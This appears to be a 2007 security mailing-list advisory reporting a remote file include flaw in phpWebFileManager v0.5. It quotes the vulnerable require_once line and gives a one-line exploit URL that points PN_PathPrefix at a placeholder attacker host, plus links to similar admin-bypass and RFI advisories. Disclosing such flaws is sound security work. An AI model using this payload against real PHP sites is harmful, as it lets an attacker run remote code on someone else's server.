Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

BellaBook Admin Bypass/Remote Code Execution

BellaBiblio Admin Login Bypass

RFI ====> vBulletin v3.6.5

Dora Emlak Script v1.0 (tr) Admin Login ByPass

From:	ilkerKandemir_(at)_mynet.com <ilkerKandemir_(at)_mynet.com>
Date:	31.07.2007
Subject:	phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability

---------------------------------------------------------------------------------
----------------------------------

MEFISTO PreSents...


Script: phpWebFileManager v0.5
Script Download: http://platon.sk/projects/download.php?id=2

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once $PN_PathPrefix . 'functions.inc.php';  <<==== it's not defined

---------------------------------------------------------------------------------
----------------------------------

Exploit:  index.php?PN_PathPrefix=http://attacker.txt?

---------------------------------------------------------------------------------
----------------------------------

Tnx:H0tturk,Ajann,Dumenci,Str0ke